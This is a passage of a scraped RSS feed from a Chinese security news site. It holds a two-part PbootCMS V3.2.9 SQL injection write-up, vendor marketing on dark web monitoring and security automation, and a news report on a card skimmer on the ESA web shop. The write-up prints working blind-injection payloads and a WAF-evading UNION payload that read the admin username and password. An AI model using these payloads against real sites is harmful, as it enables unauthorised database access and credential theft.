虽然我们现在已经能完全的对目标进行注入（包括mysql和sqlite两种数据库），而且是有回显的联合查询，但是当前的payload特征非常明显，极易被WAF查杀。有没有某种绕过WAF的方式呢？

当然是有的，PbootCMS有复杂的模板替换逻辑，只要找一个字符串替换为空的操作，然后在关键字中一直插入干扰字符，就可以轻易绕过WAF，如果你现在倒回去看一下图4，你就会发现x3e｜x3c会是一个不错的选择，例如你可以使用使用下面的payload

http://localhost:8890/PbootCMS329?tag=xxx:%7bpboot%3alist%20filter%3d1%3d2%29UNIx3eON%2fx3e%2a%2a%2fSELx3eECT%2fx3e%2a%2a%2f1,2,3,4,5,(selx3eect/**/pax3essword/**/frx3eom/x3e**/ay_user/**/lix3emit/x3e**/0,1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%2f%2a%2a%2f%23%2f%2a%2a%2f%7c123%20scode%3d123%7d%5blist%3alink%20link%3dasd%5d%7b%2fpboot%3alist%7d

0x04 结论

当前我们已经能无限制的对PbootCMS进行SQL注入了，有超过30W的互联网案例都受此漏洞影响。我认为这是2024最好用的漏洞，你觉得呢？

", "pubDate": "Fri, 27 Dec 2024 15:42:51 +0800", "author": "盛邦安全" }, { "title": "当暗网盯上你的数据，如何应对“影子”敌人？", "link": "https://www.4hou.com/posts/yz2g", "description": "

可能你并未察觉，但你的企业信息、用户数据，甚至财务记录，或许早已被挂在暗网上明码标价。

今年4月，一个名为 CyberNiggers 的黑客组织宣布入侵全球知名银行的安全系统，导致超过225万行数据被盗并公开售卖。

11月，暗网上又爆出骇人新闻——某组织窃取了4.89亿Instagram用户数据，包括姓名、邮箱、位置等私人信息。这些“数字黄金”在暗网中以加密货币等方式进行交易，买家却可能是你完全无法想象的人或组织。

✦ 暗网究竟是什么？

一般来说，我们所处的网络空间可根据其隐蔽程度而被区分为三种类型，分别是明网、深网和暗网。

明网（Surface Web），是指能够被普通搜索引擎检索到的网络，约占整个互联网的 4%左右。我们平时浏览和接触到的大多是明网，对明网进行有效的监管，能够保证明网上发布内容的合法性。

深网（Deep Web），占整个互联网的96%左右。相较于明网其隐蔽程度更高，无法被普通搜索引擎检索。深网里的内容相对不易获取，一般需要访问权限或者账号密码才可访问。

在深网的范畴里，还有一部分被称为暗网（Dark Web）的网络。它的隐蔽性极高，一般不为人所知。需要通过特殊的浏览器或软件才可以连接，普通的浏览器无法进入或检索。暗网最初是为了保护隐私而设计，如今却成了非法交易的滋生地。

✦ 暗网的“黑镜效应”：我们正面临什么？

随着暗网技术和加密货币的快速发展，网络犯罪手法不断升级。企业和个人面临的主要威胁包括：

勒索软件：黑客通过暗网出售敏感信息，迫使受害者支付高额赎金。

身份盗用：个人身份信息在暗网中广泛传播，给金融账户带来高风险。

数据泄露：企业核心数据一旦在暗网公开，不仅会造成巨大经济损失，还可能面临信任危机。

显然，在当下复杂的网络环境中，传统的防护手段已力不从心。

✦ 盛邦安全暗网监测服务

2021年9月1日，《中华人民共和国数据安全法》正式开始实施，明确了数据管理者和运营者的数据保护责任。而暗网中的勒索与数据贩卖情报，无疑对网络与数据安全提出了严峻的挑战。

为此，盛邦安全推出“暗网监测服务”， 根据暗网事件特征，深度融合暗网探测、网络空间测绘及大数据检测分析等核心技术，为用户提供强大的暗网探测与监控能力。通过以下五个步骤，实现对暗网威胁的全方位掌控：

1/暗网IP节点测绘

快速发现暗网活跃节点，掌握核心入口。

2/暗网域名存活验证

精准定位暗网活动地址，实时检测活跃程度。

3/资源爬取与清洗

利用AI算法提取有价值的信息并清洗噪声数据。

4/情报实时同步

将风险信息或情报及时通知客户，便于快速进行响应。

5/大数据分析

深度解析威胁数据，预测潜在风险。

目前，盛邦安全已识别超过 10万个暗网节点，并持续动态监测，日均活跃节点达 1.1万个。数字化时代下，数据安全防护已不再只是技术问题，更是企业数字化战略的重要组成部分。让我们共同携手，对抗暗网中的“影子”威胁，守护网络与数据的安全。

", "pubDate": "Fri, 27 Dec 2024 15:42:09 +0800", "author": "盛邦安全" }, { "title": "PbootCMS V3.2.9前台SQL注入漏洞（上）", "link": "https://www.4hou.com/posts/zAYO", "description": "

0x01 前言

PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统，是一套高效、简洁、强悍的可免费商用的PHP CMS源码，能够满足各类企业网站开发建设的需要。系统采用简单到想哭的模板标签，只要懂HTML就可快速开发企业网站。官方提供了大量网站模板免费下载和使用，将致力于为广大开发者和企业提供最佳的网站开发建设解决方案。

PbootCMS在国内有非常大的客户使用量，属于国内最流行的企业官网建站程序。截止本文发出前，其github最新版本为V3.2.9。通过互联网资产测绘平台搜索指纹header="PbootCMS"，搜索结果有超过34W+互联网案例。

$\"1.png\"/$

在最新版的PbootCMS V3.2.9中存在前台未授权SQL注入漏洞，攻击者可以通过此漏洞读取系统数据库中的敏感信息，包括后台用户的用户名和密码。

0x02 漏洞分析

之前因为某任务进行批量任务扫描时发现很多目标都在报DVB-2021-2510漏洞，其POC大致如下，返回数据匹配到your SQL syntax或syntax error。

POST /index.php?p=search
1=select

此漏洞是很早以前已经曝出的安全漏洞，对应CVE编号为CVE-2021-28245，但是最大的问题是我在最新版本的V3.2.9上测试仍然存在此漏洞。也就是官网一直都没有修这个漏洞，如下图所示。

$\"2.png\"/$

由于ddpoc上面的这个脚本主要做poc探测和验证，并不带直接的漏洞利用，需要跟踪源码分析漏洞逻辑。跟踪到漏洞对应的文件apps/home/controller/SearchController.php。

$\"3.png\"/$

PbootCMS有一套复杂的模版替换的逻辑，其中模板替换分成多个步骤，在SearchController类中会通过parserSearchLable方法对模板内容进行解析，跟踪parserSearchLable方法。parserSearchLable方法逻辑很复杂，我直接定位到最关键的部分如下。

$\"4.png\"/$

其中$receive来自于外部输入，遍历$receive变量，会生成新的数组$where3。$where3是后期漏洞利用的关键，但是这里先关注$value = request($key, 'vars')，看一下这里对数据的过滤逻辑。跟进request方法。

$\"5.png\"/$

跟进filter方法，如下图所示，当传入的d_type(也就是request方法的第二个参数)为vars时，只能包含中文、字母、数字、横线、点、逗号、空格！。而这也为后面的SQL注入的利用埋下了伏笔。

$\"QQ20241218-141500.png\"/$

回到刚才提到的$where3变量，$where3变量会传入getList方法。

$\"7.png\"/$

继续跟进getList方法，传入的$where3传入到变量$select。

$\"8.png\"/$

跟进变量$select，如下图所示，可以看到其中的$select传入了where方法，这个方法是用于组合SQL语句的查询条件。

$\"QQ20241218-141600.png\"/$

继续跟进where方法，如下图所示。当$key也就是传入的数据是一个整数时，会直接拼接$value的值，导致SQL注入漏洞。这里为什么不用$key来注入呢？因为$key前面的图里面有限制，只能输入\\w\\-\\.，不允许空格和特殊字符导致无法直接利用此注入点。

$\"10.png\"/$

0x03 漏洞利用

漏洞的整个流程已经梳理清楚了，下一步就是漏洞如何利用的问题了。这里由于request($key, 'vars')限制导致不能使用特殊字符。不能使用括号、单引号、注释和逗号会极大的限制整个漏洞的利用方式。

为方便大家直观看到SQL语句效果，我临时把SQL语句打印出来，如下图所示，大致是直接在括号中拼接SQL语句。

$\"11.png\"/$

只能使用\\w和空格的注入，极大的限制了注入点的利用，但是仍然可以通过BOOL盲注的方式来达到注入的效果。

1) 使用下面的payload访问目标，显示有搜索结果

1=select 1 from ay_user where username like 0x6125 limit 1

$\"12.png\"/$

2）使用下面的payload访问目标，显示无搜索结果

1=select 1 from ay_user where username like 0x6225 limit 1

$\"13.png\"/$

由此可以证明目标站点ay_user（管理员用户表）第一个用户的username的第一个字母是a（第一个用户默认一般是admin）。

这里很巧妙的使用mysql的like语句支持16进制编码的特性来避免使用其它特殊字符，但是整个利用过程还是有下面的注意点：

1）仅支持PbootCMS安装选择mysql数据库的网站，PbootCMS默认情况下使用的是sqlite数据库，如果是sqlite数据库，暂时不知道如何在不引入特殊字符的情况下进行注入。

2）因为不能使用逗号，所以不能通过limit 1,1这样的方式来注第二个用户，但是可以通过增加条件的方式来进行注入，例如下面的payload

1=select 1 from ay_user where username like 0x25 and username not like 0x61646d696e25 limit 1

0x04 结论

DVB-2021-2510（CVE-2021-28245）是一个很好的漏洞，互联网案例足够多，影响大。这是一个经典的有条件的SQL注入漏洞，值得小伙伴们学习研究。

在下一篇文章中，作者会带来PbootCMS更多有意思的漏洞和利用方式。

", "pubDate": "Fri, 27 Dec 2024 15:41:36 +0800", "author": "盛邦安全" }, { "title": "欧洲航天局官方网上商店遭黑客攻击", "link": "https://www.4hou.com/posts/9jXY", "description": "

本周，欧洲航天局 (ESA) 官方网上商店遭到黑客攻击，该商店出现一段 JavaScript 代码，该代码在结账时会生成虚假的 Stripe 支付页面。

欧洲航天局的预算超过 100 亿欧元，主要通过培训宇航员、建造火箭和卫星来探索宇宙的奥秘，从而扩大太空活动的极限。获得销售欧空局商品许可的网络商店目前无法使用，并显示“暂时无法使用”。

该恶意脚本本周出现在该机构的网站上，并收集客户信息，包括在购买最后阶段提供的支付卡数据。电子商务安全公司 Sansec 注意到了该恶意脚本，并提醒该商店似乎与 ESA 系统集成，可能会给该机构员工带来风险。

$\"Sansec_ESA_store.webp.png\"/$

Sansec 表示 ESA 商店遭到入侵

Sansec 发现用于泄露信息的域名与销售 ESA 商品的合法商店使用的域名相同，但具有不同的顶级域名 (TLD)。虽然欧洲机构的官方商店在 .com TLD 中使用“esaspaceshop”，但黑客在 .pics TLD 中使用相同的名称（即 esaspaceshop[.]pics），如 ESA 商店的源代码所示：

$\"MageCart_script_ESA.webp.png\"/$

ESA 网络商店中注入恶意 JavaScript

该脚本包含来自 Stripe SDK 的模糊 HTML 代码，当客户尝试完成购买时，该代码会加载虚假的 Stripe 支付页面。值得注意的是，假冒的 Stripe 页面看起来并不可疑，特别是当看到它是由 ESA 官方网上商店提供时。

$\"FakeStripe_ESA.webp.png\"/$

ESA 的网上商店加载虚假的 Stripe 支付页面

有网络应用安全公司也证实了 Sansec 的调查结果，并捕获了 ESA 官方网络商店上加载的虚假 Stripe 支付页面，目前该网店不再提供虚假的 Stripe 支付页面，但恶意脚本仍然在该网站的源代码中可见。

欧空局表示，该商店并未托管在其基础设施上，也不管理其上的数据，因为该机构不管理这些数据，它不拥有这些数据。这可以通过简单的 whois 查找来确认，该查找显示了 ESA 域名 (esa.int) 及其网络商店的完整详细信息，其中联系数据经过编辑以保护隐私。

", "pubDate": "Fri, 27 Dec 2024 12:00:00 +0800", "author": "胡金鱼" }, { "title": "一套智能+自动化的风险智能决策系统，让安全运维按点下班", "link": "https://www.4hou.com/posts/kgMK", "description": "

自从加入网安赛道，你有多久没按点下班了？

回想当初，不论是心动于网安赛道的高薪收入还是执着于内心的英雄主义想要守护网络空间的和平安宁，曾经的安全运维都是如假包换的“知识密集型”岗位。

但如今随着数字化进程的全速推进，人工智能的便捷红利扑面而来，当更多的数据与信息暴露在网络中，网络空间的安全态势也变得愈发多元、复杂且攻击频发，这不仅让企业的业务运行与经济收益时刻面临严峻威胁，更让安全运维人陷入到无休止的消耗中。

传统的安全处置模式在监测、研判、通知、协同、处置等各个环节都会过度依赖人工，于是当攻击发生时，身在实战一线的运维人也总会经历这样的场面：

·在各种设备前上下翻飞，被设备中的海量数据搞到头秃……

·在各种系统中来回跳切，任回家的末班车渐行渐远……

·黑客永远在白天按兵不动，却偏偏在凌晨三点你刚躺在床上的那一刻发起攻击……

·你纵有三头六臂，但面对各个设备、各类平台激增的告警量仍旧应接不暇……

安全运维的岗位已然从知识密集型演变成劳动密集型，但自己头顶的毛发却早已稀疏到不行……

如何用智能化的手段提升运维人的幸福指数，让运维人不再被动响应做事后诸葛，告别IT民工实现无人的值守和自动化的秒级响应，近日四川中烟工业有限责任公司（以下简称“四川中烟”）依托“智能化、自动化的新型安全运营管理体系——网络安全风险智能决策平台”给出了一套最佳的实践案例。

一、架构设计

$\"图片2.png\"/$

为实现高效的安全管理和自动化响应，网络安全风险智能决策平台采用了分层架构设计，其中：

接入层：实现多源日志接入，同时构建原子化能力调用资源池。

功能层：对海量信息进行清洗、转换，基于规则引擎和AI算法，对经过处理的数据进行深度解析，生成安全建议或直接触发自动化响应动作。

运营层：构建一体化综合运营中心。

二、实践级应用

网络安全风险智能决策平台以围绕安全事件，重点提升威胁的发现能力（监、检、测）和处置能力，依托全网的信息采集、信息分析等基础能力建设，以智能预警为基础，在既有信息安全防护体系基础上，结合新型网络安全技术，底层运用大数据技术夯实底层数据基石，中层利用人工智能提升核心安全分析能力，上层应用可视化技术直观展示数字化安全态势感知。自下而上全面构建持续性安全监测、分析、预警、响应的网络安全态势感知体系，真正实现安全威胁的主动感知和联防联控，推动全行安全威胁感知整体能力升级。

目前，平台已逐步成为四川中烟安全运营中枢，现阶段已落地并稳定运行的剧本包括：外网安全威胁自动核查封堵、漏洞扫描与自动化复核、终端安全事件处置、威胁情报/企业微信通报处置、链路与核心设备状态监测、VPN异常事件处置、周期性统计与趋势分析报表生成等。

典型剧本如下：

（1）外网安全威胁自动核查封堵

$\"图片3.png\"/$

（2）漏洞扫描与自动化复核

$\"图片4.png\"/$

（3）终端安全事件处置

$\"图片5.png\"/$

通过本次项目建设，四川中烟利用网络安全风险智能决策平台建立了各类安全处置工作的标准化流程步骤和应对措施，打造出“威胁感知、分析定位、智能决策、响应处置”的快速安全闭环能力，有效提升整体安全效果和安全运维效率，以及安全管理和监督指导能力，实现“自动响应闭环、持续安全运营”的整体目标。

三、价值收益

（1）运维人的机敏哨兵，提升安全防御能力

通过全面监控全网环境，实时发现并阻止恶意活动，显著增强公司的网络安全防护能力，能够在第一时间捕捉到潜在威胁，并采取有效的预防措施，从而减少安全事件的发生概率。

（2）减少运维人重复劳动，优化资源配置

让专业人员投入到更高价值的工作中去，提高了工作效率和资源利用率。自动化和智能化的任务分配机制，使技术人员可以从繁琐的日常维护工作中解脱出来，专注于更具挑战性的研究和发展项目。

（3）提升响应效率，让运维人按时下班

利用机器学习算法分析海量数据，快速定位问题根源，并采取有效措施进行修复，大大缩短了平均响应时间。通过预定义的工作流和自动化响应机制，能够在几秒钟内完成原本需要数小时甚至数天才能完成的操作，极大地提高了应急处理的速度和准确性。

（4）促进跨部门协作，合力守护安全

打破信息孤岛，建立统一的安全管理体系，实现各部门之间无缝对接，提升了整体协同作战的能力，有效促进不同职能部门间的紧密合作，形成了合力对抗安全威胁的良好局面。

", "pubDate": "Thu, 26 Dec 2024 18:41:05 +0800", "author": "企业资讯" } ]